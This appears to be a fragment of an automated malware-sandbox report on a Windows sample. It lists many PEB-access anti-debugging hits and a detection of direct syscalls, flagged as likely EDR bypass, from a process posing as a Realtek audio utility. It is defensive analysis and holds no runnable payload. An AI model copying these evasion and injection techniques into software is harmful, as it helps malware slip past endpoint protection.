          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33371763 mov eax, dword ptr fs:[00000030h]2_2_33371763
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33371763 mov eax, dword ptr fs:[00000030h]2_2_33371763
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33352755 mov eax, dword ptr fs:[00000030h]2_2_33352755
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33352755 mov eax, dword ptr fs:[00000030h]2_2_33352755
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33352755 mov eax, dword ptr fs:[00000030h]2_2_33352755
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33352755 mov ecx, dword ptr fs:[00000030h]2_2_33352755
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33352755 mov eax, dword ptr fs:[00000030h]2_2_33352755
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33352755 mov eax, dword ptr fs:[00000030h]2_2_33352755
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336A750 mov eax, dword ptr fs:[00000030h]2_2_3336A750
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F75B mov eax, dword ptr fs:[00000030h]2_2_3332F75B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F75B mov eax, dword ptr fs:[00000030h]2_2_3332F75B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F75B mov eax, dword ptr fs:[00000030h]2_2_3332F75B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F75B mov eax, dword ptr fs:[00000030h]2_2_3332F75B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F75B mov eax, dword ptr fs:[00000030h]2_2_3332F75B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F75B mov eax, dword ptr fs:[00000030h]2_2_3332F75B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F75B mov eax, dword ptr fs:[00000030h]2_2_3332F75B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F75B mov eax, dword ptr fs:[00000030h]2_2_3332F75B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332F75B mov eax, dword ptr fs:[00000030h]2_2_3332F75B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DE750 mov eax, dword ptr fs:[00000030h]2_2_333DE750
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B174B mov eax, dword ptr fs:[00000030h]2_2_333B174B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B174B mov ecx, dword ptr fs:[00000030h]2_2_333B174B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33363740 mov eax, dword ptr fs:[00000030h]2_2_33363740
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336174A mov eax, dword ptr fs:[00000030h]2_2_3336174A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333307A7 mov eax, dword ptr fs:[00000030h]2_2_333307A7
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FD7A7 mov eax, dword ptr fs:[00000030h]2_2_333FD7A7
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FD7A7 mov eax, dword ptr fs:[00000030h]2_2_333FD7A7
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FD7A7 mov eax, dword ptr fs:[00000030h]2_2_333FD7A7
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33361796 mov eax, dword ptr fs:[00000030h]2_2_33361796
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33361796 mov eax, dword ptr fs:[00000030h]2_2_33361796
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE79D mov eax, dword ptr fs:[00000030h]2_2_333AE79D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE79D mov eax, dword ptr fs:[00000030h]2_2_333AE79D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE79D mov eax, dword ptr fs:[00000030h]2_2_333AE79D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE79D mov eax, dword ptr fs:[00000030h]2_2_333AE79D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE79D mov eax, dword ptr fs:[00000030h]2_2_333AE79D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE79D mov eax, dword ptr fs:[00000030h]2_2_333AE79D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE79D mov eax, dword ptr fs:[00000030h]2_2_333AE79D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE79D mov eax, dword ptr fs:[00000030h]2_2_333AE79D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AE79D mov eax, dword ptr fs:[00000030h]2_2_333AE79D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3340B781 mov eax, dword ptr fs:[00000030h]2_2_3340B781
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3340B781 mov eax, dword ptr fs:[00000030h]2_2_3340B781
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333377F9 mov eax, dword ptr fs:[00000030h]2_2_333377F9
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333377F9 mov eax, dword ptr fs:[00000030h]2_2_333377F9
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335E7E0 mov eax, dword ptr fs:[00000030h]2_2_3335E7E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333337E4 mov eax, dword ptr fs:[00000030h]2_2_333337E4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333337E4 mov eax, dword ptr fs:[00000030h]2_2_333337E4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333337E4 mov eax, dword ptr fs:[00000030h]2_2_333337E4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333337E4 mov eax, dword ptr fs:[00000030h]2_2_333337E4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333337E4 mov eax, dword ptr fs:[00000030h]2_2_333337E4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333337E4 mov eax, dword ptr fs:[00000030h]2_2_333337E4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333337E4 mov eax, dword ptr fs:[00000030h]2_2_333337E4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333EF7CF mov eax, dword ptr fs:[00000030h]2_2_333EF7CF
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_334017BC mov eax, dword ptr fs:[00000030h]2_2_334017BC
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33330630 mov eax, dword ptr fs:[00000030h]2_2_33330630
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33360630 mov eax, dword ptr fs:[00000030h]2_2_33360630
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B8633 mov esi, dword ptr fs:[00000030h]2_2_333B8633
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B8633 mov eax, dword ptr fs:[00000030h]2_2_333B8633
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B8633 mov eax, dword ptr fs:[00000030h]2_2_333B8633
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336F63F mov eax, dword ptr fs:[00000030h]2_2_3336F63F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336F63F mov eax, dword ptr fs:[00000030h]2_2_3336F63F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33337623 mov eax, dword ptr fs:[00000030h]2_2_33337623
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DD62C mov ecx, dword ptr fs:[00000030h]2_2_333DD62C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DD62C mov ecx, dword ptr fs:[00000030h]2_2_333DD62C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DD62C mov eax, dword ptr fs:[00000030h]2_2_333DD62C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33335622 mov eax, dword ptr fs:[00000030h]2_2_33335622
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33335622 mov eax, dword ptr fs:[00000030h]2_2_33335622
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336C620 mov eax, dword ptr fs:[00000030h]2_2_3336C620
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C3608 mov eax, dword ptr fs:[00000030h]2_2_333C3608
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C3608 mov eax, dword ptr fs:[00000030h]2_2_333C3608
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C3608 mov eax, dword ptr fs:[00000030h]2_2_333C3608
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C3608 mov eax, dword ptr fs:[00000030h]2_2_333C3608
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C3608 mov eax, dword ptr fs:[00000030h]2_2_333C3608
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C3608 mov eax, dword ptr fs:[00000030h]2_2_333C3608
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335D600 mov eax, dword ptr fs:[00000030h]2_2_3335D600
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335D600 mov eax, dword ptr fs:[00000030h]2_2_3335D600
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333EF607 mov eax, dword ptr fs:[00000030h]2_2_333EF607
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336360F mov eax, dword ptr fs:[00000030h]2_2_3336360F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33404600 mov eax, dword ptr fs:[00000030h]2_2_33404600
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33330670 mov eax, dword ptr fs:[00000030h]2_2_33330670
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372670 mov eax, dword ptr fs:[00000030h]2_2_33372670
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372670 mov eax, dword ptr fs:[00000030h]2_2_33372670
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33327662 mov eax, dword ptr fs:[00000030h]2_2_33327662
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33327662 mov eax, dword ptr fs:[00000030h]2_2_33327662
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33327662 mov eax, dword ptr fs:[00000030h]2_2_33327662
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33343660 mov eax, dword ptr fs:[00000030h]2_2_33343660
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33343660 mov eax, dword ptr fs:[00000030h]2_2_33343660
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33343660 mov eax, dword ptr fs:[00000030h]2_2_33343660
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B166E mov eax, dword ptr fs:[00000030h]2_2_333B166E
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B166E mov eax, dword ptr fs:[00000030h]2_2_333B166E
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B166E mov eax, dword ptr fs:[00000030h]2_2_333B166E
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336666D mov esi, dword ptr fs:[00000030h]2_2_3336666D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336666D mov eax, dword ptr fs:[00000030h]2_2_3336666D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336666D mov eax, dword ptr fs:[00000030h]2_2_3336666D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33365654 mov eax, dword ptr fs:[00000030h]2_2_33365654
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333965A mov eax, dword ptr fs:[00000030h]2_2_3333965A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333965A mov eax, dword ptr fs:[00000030h]2_2_3333965A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336265C mov eax, dword ptr fs:[00000030h]2_2_3336265C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336265C mov ecx, dword ptr fs:[00000030h]2_2_3336265C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336265C mov eax, dword ptr fs:[00000030h]2_2_3336265C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33333640 mov eax, dword ptr fs:[00000030h]2_2_33333640
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334F640 mov eax, dword ptr fs:[00000030h]2_2_3334F640
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334F640 mov eax, dword ptr fs:[00000030h]2_2_3334F640
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334F640 mov eax, dword ptr fs:[00000030h]2_2_3334F640
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336C640 mov eax, dword ptr fs:[00000030h]2_2_3336C640
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336C640 mov eax, dword ptr fs:[00000030h]2_2_3336C640
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332D64A mov eax, dword ptr fs:[00000030h]2_2_3332D64A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332D64A mov eax, dword ptr fs:[00000030h]2_2_3332D64A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F86A8 mov eax, dword ptr fs:[00000030h]2_2_333F86A8
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F86A8 mov eax, dword ptr fs:[00000030h]2_2_333F86A8
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33338690 mov eax, dword ptr fs:[00000030h]2_2_33338690
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AD69D mov eax, dword ptr fs:[00000030h]2_2_333AD69D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333BC691 mov eax, dword ptr fs:[00000030h]2_2_333BC691
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333EF68C mov eax, dword ptr fs:[00000030h]2_2_333EF68C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33340680 mov eax, dword ptr fs:[00000030h]2_2_33340680
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33340680 mov eax, dword ptr fs:[00000030h]2_2_33340680
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33340680 mov eax, dword ptr fs:[00000030h]2_2_33340680
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33340680 mov eax, dword ptr fs:[00000030h]2_2_33340680
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33340680 mov eax, dword ptr fs:[00000030h]2_2_33340680
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33340680 mov eax, dword ptr fs:[00000030h]2_2_33340680
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33340680 mov eax, dword ptr fs:[00000030h]2_2_33340680
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33340680 mov eax, dword ptr fs:[00000030h]2_2_33340680
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33340680 mov eax, dword ptr fs:[00000030h]2_2_33340680
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33340680 mov eax, dword ptr fs:[00000030h]2_2_33340680
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33340680 mov eax, dword ptr fs:[00000030h]2_2_33340680
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33340680 mov eax, dword ptr fs:[00000030h]2_2_33340680
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AC6F2 mov eax, dword ptr fs:[00000030h]2_2_333AC6F2
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AC6F2 mov eax, dword ptr fs:[00000030h]2_2_333AC6F2
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333296E0 mov eax, dword ptr fs:[00000030h]2_2_333296E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333296E0 mov eax, dword ptr fs:[00000030h]2_2_333296E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333C6E0 mov eax, dword ptr fs:[00000030h]2_2_3333C6E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333356E0 mov eax, dword ptr fs:[00000030h]2_2_333356E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333356E0 mov eax, dword ptr fs:[00000030h]2_2_333356E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333356E0 mov eax, dword ptr fs:[00000030h]2_2_333356E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333566E0 mov eax, dword ptr fs:[00000030h]2_2_333566E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333566E0 mov eax, dword ptr fs:[00000030h]2_2_333566E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335D6D0 mov eax, dword ptr fs:[00000030h]2_2_3335D6D0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333306CF mov eax, dword ptr fs:[00000030h]2_2_333306CF
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FA6C0 mov eax, dword ptr fs:[00000030h]2_2_333FA6C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333D86C2 mov eax, dword ptr fs:[00000030h]2_2_333D86C2
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33333536 mov eax, dword ptr fs:[00000030h]2_2_33333536
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33333536 mov eax, dword ptr fs:[00000030h]2_2_33333536
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332753F mov eax, dword ptr fs:[00000030h]2_2_3332753F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332753F mov eax, dword ptr fs:[00000030h]2_2_3332753F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332753F mov eax, dword ptr fs:[00000030h]2_2_3332753F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372539 mov eax, dword ptr fs:[00000030h]2_2_33372539
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33361527 mov eax, dword ptr fs:[00000030h]2_2_33361527
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336F523 mov eax, dword ptr fs:[00000030h]2_2_3336F523
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3340B55F mov eax, dword ptr fs:[00000030h]2_2_3340B55F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3340B55F mov eax, dword ptr fs:[00000030h]2_2_3340B55F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334252B mov eax, dword ptr fs:[00000030h]2_2_3334252B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334252B mov eax, dword ptr fs:[00000030h]2_2_3334252B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334252B mov eax, dword ptr fs:[00000030h]2_2_3334252B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334252B mov eax, dword ptr fs:[00000030h]2_2_3334252B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334252B mov eax, dword ptr fs:[00000030h]2_2_3334252B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334252B mov eax, dword ptr fs:[00000030h]2_2_3334252B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334252B mov eax, dword ptr fs:[00000030h]2_2_3334252B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33351514 mov eax, dword ptr fs:[00000030h]2_2_33351514
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33351514 mov eax, dword ptr fs:[00000030h]2_2_33351514
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33351514 mov eax, dword ptr fs:[00000030h]2_2_33351514
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33351514 mov eax, dword ptr fs:[00000030h]2_2_33351514
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33351514 mov eax, dword ptr fs:[00000030h]2_2_33351514
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33351514 mov eax, dword ptr fs:[00000030h]2_2_33351514
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333BC51D mov eax, dword ptr fs:[00000030h]2_2_333BC51D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF51B mov eax, dword ptr fs:[00000030h]2_2_333DF51B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF51B mov eax, dword ptr fs:[00000030h]2_2_333DF51B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF51B mov eax, dword ptr fs:[00000030h]2_2_333DF51B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF51B mov eax, dword ptr fs:[00000030h]2_2_333DF51B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF51B mov eax, dword ptr fs:[00000030h]2_2_333DF51B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF51B mov eax, dword ptr fs:[00000030h]2_2_333DF51B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF51B mov ecx, dword ptr fs:[00000030h]2_2_333DF51B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF51B mov ecx, dword ptr fs:[00000030h]2_2_333DF51B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF51B mov eax, dword ptr fs:[00000030h]2_2_333DF51B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF51B mov eax, dword ptr fs:[00000030h]2_2_333DF51B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF51B mov eax, dword ptr fs:[00000030h]2_2_333DF51B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF51B mov eax, dword ptr fs:[00000030h]2_2_333DF51B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DF51B mov eax, dword ptr fs:[00000030h]2_2_333DF51B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332B502 mov eax, dword ptr fs:[00000030h]2_2_3332B502
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335E507 mov eax, dword ptr fs:[00000030h]2_2_3335E507
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335E507 mov eax, dword ptr fs:[00000030h]2_2_3335E507
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335E507 mov eax, dword ptr fs:[00000030h]2_2_3335E507
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335E507 mov eax, dword ptr fs:[00000030h]2_2_3335E507
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335E507 mov eax, dword ptr fs:[00000030h]2_2_3335E507
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335E507 mov eax, dword ptr fs:[00000030h]2_2_3335E507
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335E507 mov eax, dword ptr fs:[00000030h]2_2_3335E507
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335E507 mov eax, dword ptr fs:[00000030h]2_2_3335E507
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33332500 mov eax, dword ptr fs:[00000030h]2_2_33332500
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336C50D mov eax, dword ptr fs:[00000030h]2_2_3336C50D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336C50D mov eax, dword ptr fs:[00000030h]2_2_3336C50D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334C560 mov eax, dword ptr fs:[00000030h]2_2_3334C560
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FA553 mov eax, dword ptr fs:[00000030h]2_2_333FA553
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334E547 mov eax, dword ptr fs:[00000030h]2_2_3334E547
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33366540 mov eax, dword ptr fs:[00000030h]2_2_33366540
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33368540 mov eax, dword ptr fs:[00000030h]2_2_33368540
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333254C mov eax, dword ptr fs:[00000030h]2_2_3333254C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333345B0 mov eax, dword ptr fs:[00000030h]2_2_333345B0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333345B0 mov eax, dword ptr fs:[00000030h]2_2_333345B0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B85AA mov eax, dword ptr fs:[00000030h]2_2_333B85AA
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33362594 mov eax, dword ptr fs:[00000030h]2_2_33362594
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333BC592 mov eax, dword ptr fs:[00000030h]2_2_333BC592

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x5506BDDJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x335A488Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x33596B2Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x335A4FBJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x3362BA4Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x3361721Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x335A3C9Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x33617AF
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtCreateThreadEx: Direct from: 0x3358AA4Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x5506C54Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x3361679Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x5506A0EJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x550E82BJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQuerySystemInformation: Direct from: 0x33615CAJump to behavior
